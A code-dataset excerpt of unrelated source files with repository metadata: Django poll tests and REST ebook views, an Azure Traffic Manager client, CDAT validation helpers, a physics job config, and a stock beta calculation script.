#func_replayBufferProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, replayBufferBackup, "linear", 100000))
# start
#func_doubleQProcess.start()
#func_samplingProcess.start()
#func_replayBufferProcess.start()
| [
"[email protected]"
] | |
c85c5a1a21264c24b2b7a12107df2416af0ab32a | 7d1a96565a1b46eaa38770bc592f0f508ba659b3 | /SpojAm/BITANDOR2/testGen.py | a496d32ef0564d8b7e10439893bca07b29d8f113 | [] | no_license | RubenAshughyan/Programming-olympiads | f09dff286677d65da19f0ba4c288aa6e97ba9fd5 | 2bc85f5e6dc6879105353d90e8417b73c0be2389 | refs/heads/master | 2021-09-26T17:18:47.100625 | 2021-09-13T09:58:41 | 2021-09-13T09:58:41 | 73,565,659 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import random
n = random.randint(1,8)
k = random.randint(1,n)
a = []
for i in range(n):
a.append(str(random.randint(1,60)))
print('%d %d'%(n,k))
print(' '.join(a))
| [
"[email protected]"
] | |
9715c3b7af19ee4ef525002be62f336c8ac82a01 | e2bfd7409bf1501d14f1142e0110b9649ece0243 | /mysite/polls/tests.py | 5d395447270dcc5e5be9e6b5b79c7c6b7a1615f7 | [] | no_license | ostegura/django-sandbox | 4ea276d37f61a7dfb77626afb1d95d0e121d67a4 | e9c0fa3941b2de072d0be47554173b98e4abba79 | refs/heads/master | 2020-04-11T05:29:30.538174 | 2018-12-15T23:35:39 | 2018-12-15T23:35:39 | 161,551,134 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,046 | py | import datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from .models import Question
# Create your tests here.
class QuestionModelTest(TestCase):
def test_was_published_recently_with_future_question(self):
"""
if question was published with fitire time return False
"""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""
if older than 1 day return False
"""
time = timezone.now() - datetime.timedelta(days=1, seconds=1)
old_question = Question(pub_date=time)
self.assertIs(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""
if pub_date less than 1 day return True
"""
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
recent_question = Question(pub_date=time)
self.assertIs(recent_question.was_published_recently, True)
def create_question(question_text, days):
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionIndexViewTest(TestCase):
def test_no_question(self):
response = self.client.get(reverse('polls:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are avalaible.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""
if question is from the past we display it on the index page
"""
create_question(question_text="Past question", days=-30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
create_question(question_text="Future question", days=30)
response = self.client.get(reverse('polls:index'))
self.assertContains(response, "No polls are avalaible.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_and_past_question(self):
# even if future question exists we display only past question
create_question(question_text="Past question.", day=-30)
create_question(question_text="Future question.", day=30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>'], ['<Question: Past question 1.>']
)
class QuestionDetailViewTest(TestCase):
def test_future_question(self):
"""
detail view returns error 404 if pub_date is in the future
"""
future_question = create_question(question_text="Future question.", days=5)
url = reverse('polls:detail', args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""
if question is in the past returns its text
"""
past_question = create_question(question_text="Past question.", days=-5)
url = reverse('polls:detail', args=(past_question.id,))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
| [
"[email protected]"
] | |
dea799d87d12c2628b0fd3290d7c4109bedd94a1 | 0e4e78b06c7e4fc97cef7ac548d523ccb9bb4d9c | /helloproject/helloproject/helloapp/admin.py | c2b015baf865faba3034338a74a8702eed38736f | [] | no_license | neethu5694/DemoPython | 64d93d37653edcc7fd542e27f7acdd4eb7151901 | ae467aa42a0dbe26d1788501d925b16c1a6d974c | refs/heads/master | 2023-05-26T00:14:03.218898 | 2021-06-11T08:42:14 | 2021-06-11T08:42:14 | 368,198,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.contrib import admin
from . models import Place
from django.contrib.sites.models import Site
# Register your models here.
admin.site.register(Place)
| [
"[email protected]"
] | |
d44d6479e4e2c0520aa1f8d3b7d797376560d7f7 | acc12c85b0c56b601ddf3ebc7d53d2dc1f93d43f | /zhuangxiusheji/zhuangxiusheji/urls.py | f7261afd2e68a91d27f35b7df99e5ca5c72990c2 | [] | no_license | wadelu/zhuangxiusheji-django | 45b177b8dd7292279435696c214399c95519f389 | 82e8c8467ade4c3a75a59e3e5b3b01d2bc0f3243 | refs/heads/master | 2023-08-15T05:36:04.409999 | 2019-04-20T12:45:05 | 2019-04-20T12:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | """zhuangxiusheji URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from zx_user.views import index
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^$', index),
url(r'^admin/', admin.site.urls),
url(r'^user/', include('zx_user.urls',namespace='user')),
url(r'^user_center/', include('zx_user_center.urls', namespace='user_center')),
url(r'^anli/', include('zx_anli.urls', namespace='anli')),
url(r'^draw/', include('zx_draw.urls', namespace='draw')),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
18450d2173dc9d932a9d33cb955be284a78f7949 | 853a026149fd951a70f572f3e579e6ae24109a53 | /SUSYAnalysis/Configuration/Run2011/analysis_forNAF/RA4b_TTJets_ScaleUp.py | 50594837f2072d897a9acad6bf60e6416218a730 | [] | no_license | npietsch/usercode | 33900d00fc69dcfbba061ff3d4f869e34d368b59 | 02a2258f91b519562ff0983266b4128e49f21ce9 | refs/heads/master | 2020-04-12T07:47:53.511961 | 2013-10-30T18:37:16 | 2013-10-30T18:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,329 | py | #-------------------------------------------
# To run on the NAF, type:
#
# xport NJS_QUEUE=12
# nafJobSplitter.pl 235 RA4b_TTJets_cfg.py
#-------------------------------------------
from BjetsPAT_cfg import *
process.eventWeightPU.MCSampleFile = "TopAnalysis/TopUtils/data/MC_PUDist_Summer11_TTJets_TuneZ2_7TeV_madgraph_tauola.root"
# Choose input files
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_21_1_icR.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_6_1_NaJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_19_1_h8W.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_7_1_0i2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_1_1_Xlx.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_25_1_C9T.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_33_1_nlM.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_24_1_sS2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_28_1_32L.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_41_1_AHq.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_47_1_o4i.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_20_1_yIB.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_38_1_038.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_15_1_Xr7.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_23_1_5fZ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_4_1_ria.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_34_1_gNJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_22_1_Qw2.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_27_1_OEU.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_30_1_1rQ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_26_1_AWI.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_5_1_zD8.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_42_1_j6f.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_45_1_ylH.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_11_1_Wy0.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_12_1_MHa.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_43_1_DBn.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_36_1_OpW.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_29_1_zBx.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_13_1_oc1.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_35_1_kRa.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_14_1_T9y.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_37_1_2ao.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_17_1_Nd6.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_9_1_U2H.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_39_1_BuP.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_40_1_Yfj.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_10_1_PDJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_44_1_HqJ.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_46_1_7GX.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_31_1_eEH.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_8_1_R40.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_16_1_kOI.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_32_1_lXM.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_18_1_wz7.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_2_1_Eyj.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_3_1_cTe.root',
'/store/user/cakir/TTjets_TuneZ2_scaleup_7TeV-madgraph-tauola/SUSYPAT_TTJets_ScaleUp/27ea4c3403b4ce5da6d8f3d236870fb8/Summer11_48_1_M2E.root'
)
)
| [
""
] | |
ec3898329463467c854b0e5a88d15405f4406423 | b6a4ef1af73ee96e995659ca2a5f0eb97c708674 | /Packages/cdutil/Lib/ValidationFunctions.py | 7d7c78b49ccabc02d58dd706c26a9c1516f1a259 | [] | no_license | cedadev/cdat_lite | 1bff56d3e894af41abb9769ead83415b84313a5e | cd92cfd918e602110c0c6aaa3555d1632dd64f48 | refs/heads/master | 2021-01-15T17:45:29.077765 | 2019-07-04T17:39:32 | 2019-07-04T17:39:32 | 14,837,672 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,258 | py | # Adapted for numpy/ma/cdms2 by convertcdms.py
import string
import types
import numpy
import numpy.ma
import cdms2
import os
import cdutil
def checkStringOrNone(self,name,value):
if not type(value) in [types.StringType,types.NoneType]:
raise ValueError,name+' must be a string or None'
return value
def checkListNumbers(self,name,value):
""" check for a list of 4 number"""
if not type(value) in [types.ListType,types.TupleType,types.NoneType]:
raise ValueError, name + ' must be a list/tuple/None'
if not value is None:
for v in value:
if not type(v) in [types.IntType,types.LongType,types.FloatType]:
raise ValueError, name + ' list/tuple elements must be numbers'
return value
def setSlab(self,name,value):
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
self.data=value
return ('data',value)
elif type(value) == types.StringType:
if os.path.exists(value):
return('file',value)
else:
raise ValueError, value+" : file does not exist...."
elif type(value) == types.NoneType:
return name,value
else:
raise ValueError, name+" must be a slab, a file name or None"
def checkAxisType(self,name,value):
return checkInStringsListInt(self,name,value,[
['uniform','rect','linear'],
'gaussian',
['equal','equal area','equalarea','equal-area'],]
)
def checkAction(self,name,value):
return checkInStringsListInt(self,name,value,['select','mask'])
def setDataSetGrid(self,name,value):
if isinstance(value,cdutil.WeightedGridMaker):
return value
else:
self.grid.grid=value
def setGrid(self,name,value):
if isinstance(value,cdms2.grid.AbstractGrid):
return value
elif value is None:
self.var=None
self.file=None
self.longitude.__init__()
self.latitude.__init__()
self.weightsMaker=None
return None
else:
raise ValueError, name+" must be a grid object or None"
def setSlabOnly(self,name,value):
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
return value
elif type(value) == types.NoneType:
return value
else:
raise ValueError, name+" must be a slab or None"
def getSlab(self,name):
value=getattr(self,'_'+name)
try:
times=self.times
times_type=self.times_type
except:
times=None
times_type=''
if times_type == 'indices':
times=slice(times[0],times[1])
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
return value
elif type(value)==types.StringType:
f=cdms2.open(value)
if not times is None:
v=f(self.var,time=times)
else:
v=f(self.var)
f.close()
return v
else:
return None
def checkNumberOrNone(self,name,value):
if not type(value) in [types.IntType,types.FloatType,types.LongType,types.NoneType]:
raise ValueError,name+' must be an integer, a float, or None'
return value
def checkIntOrNone(self,name,value):
if not type(value) in [types.IntType,types.LongType,types.NoneType]:
raise ValueError,name+' must be an integer or None'
return value
def checkInStringsList(self,name,value,values):
""" check if value is in values"""
if not type(value)==types.StringType:
raise ValueError, name + 'must be a string'
elif not string.lower(value) in values:
err=name+" must be in ('"+values[0]
for v in values[1:-1]:
err=err+", '"+v+"'"
err=err+" or '"+values[-1]+"')"
raise ValueError, err
self._basic_set(name,string.lower(value))
def checkInStringsListInt(self,name,value,values):
""" checks the line type"""
val=[]
str1=name + ' can either be ('
str2=' or ('
i=0
for v in values:
if not v=='': # skips the invalid/non-contiguous values
str2=str2+str(i)+', '
if type(v) in [types.ListType,types.TupleType]:
str1=str1+"'"+v[0]+"', "
for v2 in v:
val.append(v2)
else:
val.append(v)
str1=str1+"'"+v+"', "
i=i+1
err=str1[:-2]+')'+str2[:-2]+')'
if type(value)==types.StringType:
value=string.lower(value)
if not value in val:
raise ValueError, err
i=0
for v in values:
if type(v) in [types.ListType,types.TupleType]:
if value in v:
return i
elif value==v:
return i
i=i+1
elif type(value)==types.IntType or (type(value)==types.FloatType and int(value)==value):
if not value in range(len(values)):
raise ValueError, err
else:
return int(value)
else:
raise ValueError, err
def checkNumber(self,name,value):
if not type(value) in [types.IntType,types.FloatType,types.LongType]:
raise ValueError,name+' must be an integer or a float'
return value
| [
"spascoe@a6d0c4e4-8e0a-0410-98ec-c2d9f1a29e40"
] | spascoe@a6d0c4e4-8e0a-0410-98ec-c2d9f1a29e40 |
c6ffc01ccd2fef7fd14b1b92c3b9804fbc7736d3 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/trafficmanager/azure-mgmt-trafficmanager/azure/mgmt/trafficmanager/aio/_traffic_manager_management_client.py | 414fda36d754fc895ce50031a1c07e841b208c4c | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 5,213 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import TrafficManagerManagementClientConfiguration
from .operations import EndpointsOperations
from .operations import ProfilesOperations
from .operations import GeographicHierarchiesOperations
from .operations import HeatMapOperations
from .operations import TrafficManagerUserMetricsKeysOperations
from .. import models
class TrafficManagerManagementClient(object):
"""TrafficManagerManagementClient.
:ivar endpoints: EndpointsOperations operations
:vartype endpoints: azure.mgmt.trafficmanager.aio.operations.EndpointsOperations
:ivar profiles: ProfilesOperations operations
:vartype profiles: azure.mgmt.trafficmanager.aio.operations.ProfilesOperations
:ivar geographic_hierarchies: GeographicHierarchiesOperations operations
:vartype geographic_hierarchies: azure.mgmt.trafficmanager.aio.operations.GeographicHierarchiesOperations
:ivar heat_map: HeatMapOperations operations
:vartype heat_map: azure.mgmt.trafficmanager.aio.operations.HeatMapOperations
:ivar traffic_manager_user_metrics_keys: TrafficManagerUserMetricsKeysOperations operations
:vartype traffic_manager_user_metrics_keys: azure.mgmt.trafficmanager.aio.operations.TrafficManagerUserMetricsKeysOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Gets subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = TrafficManagerManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.endpoints = EndpointsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.profiles = ProfilesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.geographic_hierarchies = GeographicHierarchiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.heat_map = HeatMapOperations(
self._client, self._config, self._serialize, self._deserialize)
self.traffic_manager_user_metrics_keys = TrafficManagerUserMetricsKeysOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "TrafficManagerManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"[email protected]"
] | |
32bdf883d5a8cc13ed9969d566847901edc019e4 | 82a477b29e870161d5e6b57b3978459520d819af | /get_beta.py | 10f2388bce6a36408d34541eeec3186cf9975473 | [] | no_license | felipm13/finance | afbeb15b9cc08a4c0a9f11c8c4d5efa7186174d3 | f981501f17697bf00638af062a0ac0ac3ea9dee9 | refs/heads/master | 2020-04-13T09:39:41.684032 | 2018-12-26T01:31:16 | 2018-12-26T01:31:16 | 163,117,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | import pandas as pd
from scipy import stats
vale = pd.read_csv('VALE3.csv', parse_dates=True, index_col='Date',)
ibov = pd.read_csv('IBOV.csv', parse_dates=True, index_col='Date')
# joining the closing prices of the two datasets
monthly_prices = pd.concat([vale['Close'], ibov['Close']], axis=1)
monthly_prices.columns = ['VALE3', 'IBOV']
# check the head of the dataframe
#print(monthly_prices.head())
# calculate monthly returns
monthly_returns = monthly_prices.pct_change(1)
clean_monthly_returns = monthly_returns.dropna(axis=0) # drop first missing row
#print(clean_monthly_returns.head())
# split dependent and independent variable
X = clean_monthly_returns['IBOV']
y = clean_monthly_returns['VALE3']
slope, intercept, r_value, p_value, std_err = stats.linregress(X, y)
print("Beta: ", slope)
| [
"[email protected]"
] | |
4d19b1f3d5c877e2dafccaef7ddd45c29aafc50f | 4c71193d1e46c658e4b91b88318bf98efe71d2bb | /ebooks/views.py | a5e661a00f8dcec5e8d76c8301a64c14e26ab1fd | [
"MIT"
] | permissive | AFHEEM/ebooksapi | df2d91f26ac78580725db1a5e71739860e1aef8f | 5ed73c606439f972e64d116f2322410c19beec7d | refs/heads/master | 2023-05-09T08:06:59.560231 | 2021-06-07T11:10:54 | 2021-06-07T11:10:54 | 374,370,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,874 | py | # from rest_framework import mixins
from rest_framework import generics
from ebooks.models import Ebook, Review
from ebooks.serializers import EbookSerializer, ReviewSerializer
class EbookListCreateAPIView(generics.ListCreateAPIView):
"""
List Ebooks
"""
queryset = Ebook.objects.all()
serializer_class = EbookSerializer
class EbookDetailAPIView(generics.RetrieveUpdateDestroyAPIView):
"""
List Ebooks
"""
queryset = Ebook.objects.all()
serializer_class = EbookSerializer
class ReviewCreateAPIView(generics.CreateAPIView):
"""
Create a Review
"""
queryset = Review.objects.all()
serializer_class = ReviewSerializer
def perform_create(self, serializer):
"""
Override Review creation
:param serializer:
:return:
"""
ebook_pk = self.kwargs.get('ebook_pk')
ebook = generics.get_object_or_404(Ebook, pk=ebook_pk)
serializer.save(ebook=ebook)
class ReviewDetailAPIView(generics.RetrieveUpdateDestroyAPIView):
"""
Get, update and delete a review object
"""
queryset = Review.objects.all()
serializer_class = ReviewSerializer
# class EbookListCreateAPIView(mixins.ListModelMixin,
# mixins.CreateModelMixin,
# generics.GenericAPIView):
# """
# Display Ebooks as a list
# """
# queryset = Ebook.objects.all()
# serializer_class = EbookSerializer
#
# def get(self, request, *args, **kwargs):
# """
# Get all ebooks
# :param request:
# :return:
# """
# return self.list(request, *args, **kwargs)
#
# def post(self, request, *args, **kwargs):
# """
# Get all ebooks
# :param request:
# :return:
# """
# return self.create(request, *args, **kwargs) | [
"[email protected]"
] | |
